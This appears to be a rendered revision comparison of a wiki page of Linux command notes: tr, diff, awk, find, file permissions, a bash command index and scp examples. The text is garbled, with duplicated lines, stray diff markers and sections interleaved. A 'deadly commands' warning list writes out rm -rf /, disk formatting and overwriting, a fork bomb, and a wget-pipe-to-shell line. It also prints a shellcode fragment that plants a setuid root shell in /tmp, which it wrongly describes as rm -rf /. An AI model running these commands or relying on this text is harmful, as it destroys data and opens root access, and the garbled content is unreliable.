The tr command is an easy way to do simple character translations on the fly. In the following example, new lines are replaced with spaces, so all the files listed from the current directory are output on one line:
$ ls | tr '\n' ' ' Replace newline characters with spaces
$ ls | tr '\n' ' ' Replace newline characters with spaces
The tr command can be used to replace one character with another, but does not work with strings like sed does. The following command replaces all instances of the lowercase letter f with a capital F.
The tr command can be used to replace one character with another, but does not work with strings like sed does. The following command replaces all instances of the lowercase letter f with a capital F.


$ tr f F < myfile.txt Replace every f in the file with F
$ tr f F < myfile.txt Replace every f in the file with F
You can also use the tr command to simply delete characters. Here are two examples:
You can also use the tr command to simply delete characters. Here are two examples:


$ ls | tr -d '\n' Delete new lines (resulting in one line)
$ ls | tr -d '\n' Delete new lines (resulting in one line)
$ tr -d f < myfile.txt Delete every letter f from the file
$ tr -d f < myfile.txt Delete every letter f from the file
The tr command can do some nifty tricks when you specify ranges of characters to work on. Here's an example of capitalizing lowercase letters to uppercase letters:
The tr command can do some nifty tricks when you specify ranges of characters to work on. Here's an example of capitalizing lowercase letters to uppercase letters:


$ echo chris | tr a-z A-Z Translate chris into CHRIS
$ echo chris | tr a-z A-Z Translate chris into CHRIS
CHRIS
CHRIS
The same result can be obtained with the following syntax:
The same result can be obtained with the following syntax:


$ echo chris | tr '[:lower:]' '[:upper:]' Translate chris into CHRIS
$ echo chris | tr '[:lower:]' '[:upper:]' Translate chris into CHRIS
Checking Differences Between Two Files with diff
Checking Differences Between Two Files with diff
When you have two versions of a file, it can be useful to know the differences between the two files. For example, when upgrading a software package, you may save your old configuration file under a new file name, such as config.old or config.bak, so you preserve your configuration. When that occurs, you can use the diff command to discover which lines differ between your configuration and the new configuration, in order to merge the two. For example:
When you have two versions of a file, it can be useful to know the differences between the two files. For example, when upgrading a software package, you may save your old configuration file under a new file name, such as config.old or config.bak, so you preserve your configuration. When that occurs, you can use the diff command to discover which lines differ between your configuration and the new configuration, in order to merge the two. For example:


$ diff config config.old
$ diff config config.old
You can change the output of diff to what is known as unified format. Unified format can be easier to read by human beings. It adds three lines of context before and after each block of changed lines that it reports, and then uses + and - to show the difference between the files. The following set of commands creates a file (f1.txt) containing a sequence of numbers (1-7), creates a file (f2.txt) with one of those numbers changed (using sed), and compares the two files using the diff command:
You can change the output of diff to what is known as unified format. Unified format can be easier to read by human beings. It adds three lines of context before and after each block of changed lines that it reports, and then uses + and - to show the difference between the files. The following set of commands creates a file (f1.txt) containing a sequence of numbers (1-7), creates a file (f2.txt) with one of those numbers changed (using sed), and compares the two files using the diff command:


$ seq 1 7 > f1.txt Send a sequence of numbers to f1.txt
$ seq 1 7 > f1.txt Send a sequence of numbers to f1.txt
$ cat f1.txt Display contents of f1.txt
$ cat f1.txt Display contents of f1.txt
1
1
2
2
Line 1,438: Line 933:
6
6
7
7
$ sed s/4/FOUR/ < f1.txt > f2.txt Change 4 to FOUR and send to f2.txt
 
$ diff f1.txt f2.txt
$ sed s/4/FOUR/ < f1.txt > f2.txt Change 4 to FOUR and send to f2.txt
$ diff f1.txt f2.txt
4c4 Shows line 4 was changed in file
4c4 Shows line 4 was changed in file
< 4
< 4
Line 1,458: Line 954:
The diff -u output just displayed adds information such as modification dates and times to the regular diff output. The sdiff command can be used to give you yet another view. The sdiff command can merge the output of two files interactively, as shown in the following output:
The diff -u output just displayed adds information such as modification dates and times to the regular diff output. The sdiff command can be used to give you yet another view. The sdiff command can merge the output of two files interactively, as shown in the following output:


$ sdiff f1.txt f2.txt
$ sdiff f1.txt f2.txt
1 1
1 1
2 2
2 2
Line 1,466: Line 962:
6 6
6 6
7 7
7 7
Another variation on the diff theme is vimdiff, which opens the two files side by side in Vim and outlines the differences in color. Similarly, gvimdiff opens the two files in gVim.
'''Another variation on the diff theme is vimdiff, which opens the two files side by side in Vim and outlines the differences in color. Similarly, gvimdiff opens the two files in gVim.'''


  Note
  Note
You need to install the vim-gnome package to run the gvim or gvimdiff program.
You need to install the vim-gnome package to run the gvim or gvimdiff program.
The output of diff -u can be fed into the patch command. The patch command takes an old file and a diff file as input and outputs a patched file. Following on the example above, we use the diff command between the two files to generate a patch and then apply the patch to the first file:
The output of diff -u can be fed into the patch command. The patch command takes an old file and a diff file as input and outputs a patched file. Following on the example above, we use the diff command between the two files to generate a patch and then apply the patch to the first file:
$ diff -u f1.txt f2.txt > patchfile.txt
$ diff -u f1.txt f2.txt > patchfile.txt
$ patch f1.txt < patchfile.txt
$ patch f1.txt < patchfile.txt
patching file f1.txt
patching file f1.txt
$ cat f1.txt
$ cat f1.txt
Line 1,484: Line 980:
That is how many OSS developers (including kernel developers) distribute their code patches. The patch and diff commands can also be run on entire directory trees. However, that usage is outside the scope of this book.
That is how many OSS developers (including kernel developers) distribute their code patches. The patch and diff commands can also be run on entire directory trees. However, that usage is outside the scope of this book.


Using awk and cut to Process Columns
====Using awk and cut to Process Columns====
Another massive text processing tool is the awk command. The awk command is a full-blown programming language. Although there is much more you can do with the awk command, the following examples show you a few tricks related to extracting columns of text:
Another massive text processing tool is the awk command. The awk command is a full-blown programming language. Although there is much more you can do with the awk command, the following examples show you a few tricks related to extracting columns of text:
$ ps auwx | awk '{print $1,$11}' Show columns 1, 11 of ps
$ ps auwx | awk '{print $1,$11}' Show columns 1, 11 of ps
$ ps auwx | awk '/francois/ {print $11}' Show francois' processes
$ ps auwx | awk '/francois/ {print $11}' Show francois' processes
$ ps auwx | grep francois | awk '{print $11}' Same as above
$ ps auwx | grep francois | awk '{print $11}' Same as above
The first example displays the contents of the first column (user name) and eleventh column (command name) from currently running processes output from the ps command (ps auwx). The next two commands produce the same output, with one using the awk command and the other using the grep command to find all processes owned by the user named francois. In each case, when processes owned by francois are found, column 11 (command name) is displayed for each of those processes.
The first example displays the contents of the first column (user name) and eleventh column (command name) from currently running processes output from the ps command (ps auwx). The next two commands produce the same output, with one using the awk command and the other using the grep command to find all processes owned by the user named francois. In each case, when processes owned by francois are found, column 11 (command name) is displayed for each of those processes.


By default, the awk command assumes the delimiter between columns is spaces. You can specify a different delimiter with the -F option as follows:
By default, the awk command assumes the delimiter between columns is spaces. You can specify a different delimiter with the -F option as follows:
$ awk -F: '{print $1,$5}' /etc/passwd Use colon delimiter to print cols
$ awk -F: '{print $1,$5}' /etc/passwd Use colon delimiter to print cols
You can get similar results with the cut command. As with the previous awk example, we specify a colon (:) as the column delimiter to process information from the /etc/ passwd file:
You can get similar results with the cut command. As with the previous awk example, we specify a colon (:) as the column delimiter to process information from the /etc/ passwd file:


$ cut -d: -f1,5 /etc/passwd Use colon delimiter to print cols
$ cut -d: -f1,5 /etc/passwd Use colon delimiter to print cols
The cut command can also be used with ranges of fields. The following command prints columns 1 thru 5 of the /etc/passwd file:
The cut command can also be used with ranges of fields. The following command prints columns 1 thru 5 of the /etc/passwd file:


$ cut -d: -f1-5 /etc/passwd Show columns 1 through 5
$ cut -d: -f1-5 /etc/passwd Show columns 1 through 5
Instead of using a dash (-) to indicate a range of numbers, you can use it to print all columns from a particular column number and above. The following command displays all columns from column 5 and above from the /etc/passwd file:
Instead of using a dash (-) to indicate a range of numbers, you can use it to print all columns from a particular column number and above. The following command displays all columns from column 5 and above from the /etc/passwd file:


$ cut -d: -f5- /etc/passwd Show columns 5 and later
$ cut -d: -f5- /etc/passwd Show columns 5 and later
We prefer to use the awk command when columns are separated by a varying number of spaces, such as the output of the ps command. And we prefer the cut command when dealing with files delimited by commas (,) or colons (:), such as the /etc/ password file.
We prefer to use the awk command when columns are separated by a varying number of spaces, such as the output of the ps command. And we prefer the cut command when dealing with files delimited by commas (,) or colons (:), such as the /etc/ password file.


Converting Text Files to Different Formats
====Converting Text Files to Different Formats====
Text files in the Unix world use a different end-of-line character (\n) than those used in the DOS/Windows world (\r\n). You can view these special characters in a text file with the od command:
Text files in the Unix world use a different end-of-line character (\n) than those used in the DOS/Windows world (\r\n). You can view these special characters in a text file with the od command:
$ od -c -t x1 myfile.txt
$ od -c -t x1 myfile.txt
So they will appear properly when copied from one environment to the other, it is necessary to convert the files. Here are some examples:
So they will appear properly when copied from one environment to the other, it is necessary to convert the files. Here are some examples:


$ unix2dos < myunixfile.txt > mydosfile.txt
$ unix2dos < myunixfile.txt > mydosfile.txt
$ cat mydosfile.txt | dos2unix > myunixfile.txt
$ cat mydosfile.txt | dos2unix > myunixfile.txt
The unix2dos example just shown above converts a Linux or Unix plain text file (myunixfile.txt) to a DOS or Windows text file (mydosfile.txt). The dos2unix example does the opposite by converting a DOS/Windows file to a Linux/Unix file. These commands require you to install the tofrodos package.
The unix2dos example just shown above converts a Linux or Unix plain text file (myunixfile.txt) to a DOS or Windows text file (mydosfile.txt). The dos2unix example does the opposite by converting a DOS/Windows file to a Linux/Unix file. These commands require you to install the tofrodos package.


</pre>
== Searching for Files Using Locate and Find ==
<pre>
Searching for Files
Ubuntu keeps a database of all the files in the file system (with a few exceptions defined in /etc/updatedb.conf) using features of the mlocate package. The locate command allows you to search that database. (On Ubuntu, the locate command is a symbolic link to the secure version of the command, slocate.) The results come back instantly, since the database is searched and not the actual file system. Before locate was available, most Linux users ran the find command to find files in the file system. Both locate and find are covered here.
Finding Files with Locate
Because the database contains the name of every node in the file system, and not just commands, you can use locate to find commands, devices, man pages, data files, or anything else identified by a name in the file system. Here is an example:
$ locate e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000/e1000.ko
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000/napi.h
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000/napi.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000/Makefile
/usr/src/linux-headers-2.6.20-16/include/config/e1000.h
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000/Makefile
The above example found two versions of the e1000.ko and e1000.ko kernel modules. locate is case sensitive unless you use the –i option. Here's an example:
$ locate -i itco_wdt
/lib/modules/2.6.20-16-generic/kernel/drivers/char/watchdog/iTCO_wdt.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/char/watchdog/iTCO_wdt.ko
The slocate package (or mlocate on some Linux distributions) includes a cron job that runs the updatedb command once per day to update the locate database of files.
To update the locate database immediately, you can run the updatedb command manually:
$ sudo updatedb
Locating Files with Find
Before the days of locate, the way to find files was with the find command. Although locate will come up with a file faster, find has many other powerful options for finding files based on attributes other than the name.
    Note   
Searching the entire file system can take a long time to complete. Before searching the whole file system, consider searching a subset of the file system or excluding certain directories or remotely mounted file systems.
This example searches the root file system (/) recursively for files named e100:
$ find / -name "e100*" -print
find: /usr/lib/audit: Permission denied
find: /usr/libexec/utempter: Permission denied
/sys/module/e100
/sys/bus/pci/drivers/e100
...
Running find as a normal user can result in long lists of Permission denied as find tries to enter a directory you do not have permissions to. You can filter out the inaccessible directories:
$ find / -name e100 -print 2>&1 | grep -v "Permission denied"
Or send all errors to the /dev/null bit bucket:
$ find / -name e100 -print 2> /dev/null
Because searches with find are case sensitive and must match the name exactly (e100 won't match e100.ko), you can use regular expressions to make your searches more inclusive. Here's an example:
$ find / -name 'e100*' -print
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-16-generic/kernel/drivers/net/e100.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e1000/e1000.ko
/lib/modules/2.6.20-15-generic/kernel/drivers/net/e100.ko
/usr/src/linux-headers-2.6.20-16-generic/include/config/e100.h
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-16-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e100.h
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000
/usr/src/linux-headers-2.6.20-15-generic/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/include/config/e100.h
/usr/src/linux-headers-2.6.20-15/include/config/e1000.h
/usr/src/linux-headers-2.6.20-15/drivers/net/e1000
/usr/src/linux-headers-2.6.20-16/include/config/e100.h
/usr/src/linux-headers-2.6.20-16/include/config/e1000.h
/usr/src/linux-headers-2.6.20-16/drivers/net/e1000
You can also find files based on timestamps. This command line finds files in /usr/bin/ that have been accessed in the past two minutes:
$ find /usr/bin/ -amin -2 -print
/usr/bin/
/usr/bin/find
This command line finds files that have not been accessed in /home/chris for more than 60 days:
$ find /home/chris/ -atime +60
Use the -type d option to find directories. The following command line finds all directories under /etc and redirects stderr to the bit bucket (/dev/null):
$ find /etc -type d -print 2> /dev/null
This command line finds files in /sbin with permissions that match 750:
$ find /sbin/ -perm 750 -print
(which match none in a default Ubuntu installation.)
The exec option to find is very powerful, because it lets you act on the files found with the find command. The following command finds all the files in /var owned by the user francois (must be a valid user) and executes the ls -l command on each one:
$ find /var -user francois -exec ls -l {} \;
An alternative to find's exec option is xargs:
$ find /var -user francois -print | xargs ls -l
There are big differences on how the two commands just shown operate, leading to very different performance. The find -exec spawns the command ls for each result it finds. The xargs command works more efficiently by passing many results as input to a single ls command.
To negate a search criteria, place an exclamation point (!) before that criteria. The next example finds all the files that are not owned by the group root and are regular files, and then does an ls -l on each:
$ find / ! -group root -type f -print 2> /dev/null | xargs ls -l
The next example finds the files in /sbin that are regular files and are not writable by others, then feeds them to an ls -l command:
$ find /sbin/ -type f ! -perm /o+w -print | xargs ls -l
-rwxr-xr-x 1 root root    3056 2007-03-07 15:44 /sbin/acpi_available
-rwxr-xr-x 1 root root    43204 2007-02-18 20:18 /sbin/alsactl
Finding files by size is a great way to determine what is filling up your hard disks. The following command line finds all files that are greater than 10 MB (+10M), lists those files from largest to smallest (ls -lS) and directs that list to a file (/tmp/bigfiles.txt):
$ find / -xdev -size +10M -print | xargs ls -lS > /tmp/bigfiles.txt
In this example, the -xdev option prevents any mounted file systems, besides the root file system, from being searched. This is a good way to keep the find command from searching the /proc directory and any remotely mounted file systems, as well as other locally mounted file systems.
Using Other Commands to Find Files
Other commands for finding files include the whereis and which commands. Here are some examples of those commands:
$ whereis man
man: /usr/bin/man /usr/X11R6/bin/man /usr/bin/X11/man /usr/local/man
/usr/share/man /usr/share/man/man1/man.1.gz /usr/share/man/man7/man.7.gz
$ which ls
/bin/ls
The whereis command is useful because it not only finds commands, it also finds man pages and configuration files associated with a command. From the example of whereis for the word man, you can see the man executable, its configuration file, and the location of man pages for the man command. The which example shows where the ls executable is (/bin/ls). The which command is useful when you're looking for the actual location of an executable file in your PATH, as in this example:
</pre>
== Setting File and Directory Permissions ==
<pre>
Setting File/Directory Permissions
The ability to access files, run commands, and change to a directory can be restricted with permission settings for user, group, and other users. When you do a long list (ls -l) of files and directories in Linux, the beginning 10 characters shown indicate what the item is (file, directory, block device, and so on) along with whether or not the item can be read, written, and/or executed.
To follow along with examples in this section, create a directory called /tmp/test and a file called /tmp/test/hello.txt. Then do a long listing of those two items, as follows:
$ mkdir /tmp/test
$ echo "some text" > /tmp/test/hello.txt
$ ls -ld /tmp/test/ /tmp/test/hello.txt
drwxr-xr-x  2 francois sales 4096 Mar 21 13:11 /tmp/test
-rw-r--r--  2 francois sales  10 Mar 21 13:11 /tmp/test/hello.txt
After creating the directory and file, the first character of the long listing shows /tmp/ test as a directory (d) and hello.txt as a file (-). Other types of files available in Linux that would appear as the first character include character devices (c), block devices (b) or symbolic links (l), named pipes (p), and sockets (s).
The next nine characters represent the permissions set on the file and directory. The first rwx indicates that the owner (francois) has read, write, and execute permissions on the directory. Likewise, the group sales has the more restricted permissions (r-x) with no write permission. Then all other users have only read and execute permissions (r-x); the dash indicates the missing write permission. For the hello.txt file, the user has read and write permissions (rw-) and members of the group and all others have read permission (r--).
When you set out to change permissions, each permission can be represented by an octal number (where read is 4, write is 2, and execute is 1) or a letter (rwx). Generally speaking, read permission lets you view the contents of the directory, write lets you change (add or modify) the contents of the directory, and execute lets you change to (in other words, access) the directory.
If you don't like the permissions you see on files or directories you own, you can change those permissions using the chmod command.
Changing Permissions with chmod
The chmod command lets you change the access permissions of files and directories. Table 4-1 shows several chmod command lines and how access to the directory or file changes.
Table 4-1: Changing Directory and File Access Permissions
chmod command (octal or letters)
Original Permission
New Permission
Description
chmod 0700
any
drwx------
The directory's owner can read or write files in that directory as well as change to it. All other users (except root) have no access.
chmod 0711
any
drwx--x--x
Same as for the owner. All others can change to the directory, but not view or change files in the directory. This can be useful for server hardening, where you prevent someone from listing directory contents, but allow access to a file in the directory if someone already knows it's there.
chmod go+r
drwx------
drwxr--r--
Adding read permission to a directory may not give desired results. Without execute on, others can't view the contents of any files in that directory.
chmod 0777
chmod a=rwx
any
drwxrwxrwx
All permissions are wide open.
chmod 0000
chmod a-rwx
any
d---------
All permissions are closed. Good to protect a directory from errant changes. However, backup programs that run as non-root may fail to back up the directory's contents.
chmod 666
any
-rw-rw-rw-
Open read/write permissions completely on a file.
chmod go-rw
-rw-rw-rw-
-rw-------
Don't let anyone except the owner view, change, or delete the file.
chmod 644
any
-rw-r--r--
Only the owner can change or delete the file, but all can view it.
The first 0 in the mode line can usually be dropped (so you can use 777 instead of 0777). That placeholder has special meaning. It is an octal digit that can be used on commands (executables) to indicate that the command can run as a set-UID program (4), run as a set-GID program (2), or become a sticky program (1). With set-UID and set-GID, the command runs with the assigned user or group permissions (instead of running with permission of the user or group that launched the command).
Warning
SUID should not be used on shell scripts. Here is a warning from the Linux Security HOWTO: "SUID shell scripts are a serious security risk, and for this reason the kernel will not honor them. Regardless of how secure you think the shell script is, it can be exploited to give the cracker a root shell."
Having the sticky bit on for a directory keeps users from removing or renaming files from that directory that they don't own (/tmp is an example). Given the right permission settings, however, users can change the contents of files they don't own in a sticky bit directory. The final permission character is t instead of x on a sticky directory. A command with sticky bit on used to cause the command to stay in memory, even while not being used. This is an old Unix feature that is not supported in Linux.
The -R option is a handy feature of the chmod command. With -R, you can recursively change permissions of all files and directories starting from a point in the file system. Here are some examples:
$ sudo chmod -R 700 /tmp/test  Open permission only to owner below /tmp/test
$ sudo chmod -R 000 /tmp/test  Close all permissions below /tmp/test
$ sudo chmod -R a+rwx /tmp/test Open all permissions to all below /tmp/test
Note that the -R option is inclusive of the directory you indicate. So the permissions above, for example, would change for the /tmp/test directory itself, and not just for the files and directories below that directory.
Setting the umask
Permissions given to a file or directory are assigned originally at the time that item is created. How those permissions are set is based on the user's current umask value. Using the umask command, you can set the permissions given to files and directories when you create them.
$ umask 0066  Make directories drwx--x--x and files -rw-------
$ umask 0077  Make directories drwx------ and files -rw-------
$ umask 0022  Make directories drwxr-xr-x and files -rw-r--r--
$ umask 0777  Make directories d--------- and files ----------
Changing Ownership
When you create a file or directory, your user account is assigned to that file or directory. So is your primary group. As root user, you can change the ownership (user) and group assigned to a file to a different user and/or group using the chown and chgrp commands. Here are some examples:
$ chown chris test/          Change owner to chris
$ chown chris:market test/  Change owner to chris and group to market
$ chgrp market test/        Change group to market
$ chown -R chris test/      Change all files below test/ to owner chris
The recursive option to chown (-R) just shown is useful if you need to change the ownership of an entire directory structure. As with chmod, using chown recursively changes permissions for the directory named, along with its contents. You might use chown recursively when a person leaves a company or stops using your web service. You can use chown -R to reassign their entire /home directory to a different user.</pre>
== 7 Deadly Linux Commands ==
== 7 Deadly Linux Commands ==
<pre>
The 7 Deadly Linux Commands
The 7 Deadly Linux Commands


If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.
If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.


1. Code:
* This command will recursively and forcefully delete all the files inside the root directory.
rm -rf /


rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.
2. Code:


* This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.
<pre>
char esp[] __attribute__ ((section(".text"))) /* e.s.p
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
release */
Line 1,820: Line 1,031:
"cp -p /bin/sh /tmp/.beyond; chmod 4755
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
/tmp/.beyond;";
This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.
3. Code:
mkfs.ext3 /dev/sda
This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
4. Code:
:(){:|:&};:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
5. Code:
any_command > /dev/sda
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
6. Code:
wget http://some_untrusted_source -O- | sh
Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.
7. Code:
mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.
</pre>
</pre>
== List of Linux Bash Shell Commands ==
<pre>
An A-Z Index of the Linux BASH command line


alias Create an alias
*This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
apropos Search Help manual pages (man -k)
awk Find and Replace text, database sort/validate/index
break Exit from a loop
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)


cal Display a calendar
mkfs.ext3 /dev/sda
case Conditionally perform a command
cat Display the contents of a file
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts


date Display or change the date & time
*Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
dc Desk Calculator
dd Data Dump - Convert and copy a file
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
du Estimate file space usage


echo Display message on screen
:(){:|:&};:
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions


false Do nothing, unsuccessfully
*With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros


gawk Find and Replace text within file(s)
any_command > /dev/sda
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)


hash Remember the full pathname of a name argument
*Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.
head Output the first part of file(s)
wget http://some_untrusted_source -O- | sh
history Command History
hostname Print or set system name


id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
import Capture an X server screen and save the image to file
install Copy files and set attributes


join Join lines on a common field
* This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
mv /home/yourhomedirectory/* /dev/null


kill Stop a process from running
== Copy Files Using SCP ==
<h4>copy from a remote machine to my machine: </h4>
''' you have to be in the local machine terminal to run below'''
scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt


less Display output one screen at a time
<h4>copy from my machine to a remote machine: </h4>
let Perform arithmetic on shell variables
scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt
ln Make links between files
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files


make Recompile a group of programs
<h4>copy all file*.txt from a remote machine to my machine (file01.txt, file02.txt, etc.; note the quotation marks: </h4>
man Help manual
scp "user@192.168.1.100:/home/remote_user/Desktop/file*.txt" /home/me/Desktop/file.txt
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mv Move or rename files or directories


netstat Networking information
<h4>copy a directory from a remote machine to my machine: </h4>
nice Set the priority of a command or job
scp -r user@192.168.1.100:/home/remote_user /Desktop/files /home/me/Desktop/
nl Number lines and write files
<h4>Local to remote</h4>
nohup Run a command immune to hangups
scp -r directory root@domain.com:/var/www/
nslookup Query Internet name servers interactively


passwd Modify a user password
<h4>Copy Files and directories when you are cd into that directory</h4>
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory


quota Display disk usage and limits
scp -r * root@domain.com:/var/www/
quotacheck Scan a file system for disk usage
see 'man scp' or 'man sftp' for more ..
quotactl Set disk quotas
 
ram ram disk device
rcp Copy files between two machines.
read read a line from standard input
readonly Mark variables/functions as readonly
remsync Synchronize remote files via email
return Exit a shell function
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
 
screen Terminal window manager
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sum Print a checksum for a file
symlink Make a new name for a file
sync Synchronize data on disk with memory
 
tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command
 
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
 
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor


watch Execute/display a program periodically
=== SCP with Key ===
wc Print byte, word, and line counts
scp -i ~/.ssh/id_rsa.pub FILENAME USER@SERVER:/home/USER/FILENAME
whereis Report all known instances of a command
which Locate a program file in the user's path.
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
Wget Retrieve web pages or files via HTTP, HTTPS or FTP


xargs Execute utility, passing constructed argument list(s)
yes Print a string until interrupted
. Run a command script in the current shell
### Comment / Remark
</pre>
== Copy Files Using SSH ==
<pre>
copy from a remote machine to my machine:
scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt
copy from my machine to a remote machine:
scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt
copy all file*.txt from a remote machine to my machine (file01.txt, file02.txt, etc.; note the quotation marks:
scp "user@192.168.1.100:/home/remote_user/Desktop/file*.txt" /home/me/Desktop/file.txt
copy a directory from a remote machine to my machine:
scp -r user@192.168.1.100:/home/remote_user /Desktop/files /home/me/Desktop/
Local to remote
scp -r directory root@domain.com:/var/www/
Copy Files and directories when you are cd into that directory
scp -r * root@domain.com:/var/www/
see 'man scp' or 'man sftp' for more ..
</pre>
== My Frequently used Linux Commands ==
== My Frequently used Linux Commands ==
<pre>
<h4>command to Show all users:</h4>
command to Show all users:
cat /etc/passwd  
cat /etc/passwd  
lastlog
 
List all installed Apache Modules
apache2ctl -M


Update server
lastlog


<h4>List all installed Apache Modules</h4>
apache2ctl -M
<h4>Update server </h4>
  sudo apt-get update
  sudo apt-get update


sudo apt-get dist-upgrade
sudo apt-get dist-upgrade
 
Move files and folders


mv *.*  -wil move all files and not folders
<h4>Move files and folders</h4>
mv *.*  -wil move all files and not folders
mv * -will move all files and folders
<h4>Updating Ubuntu</h4>
sudo aptitude update
sudo aptitude safe-upgrade
ssh using different port
ssh -p 113 root@whatever.com


mv * -will move all files and folders
<h4>Change Permissions</h4>
 
chmod 777 -R folder
 
 
Updating Ubuntu
 
sudo aptitude update
 
sudo aptitude safe-upgrade
 
ssh using different port
 
ssh -p 113 root@whatever.com
 
Change Permissions
 
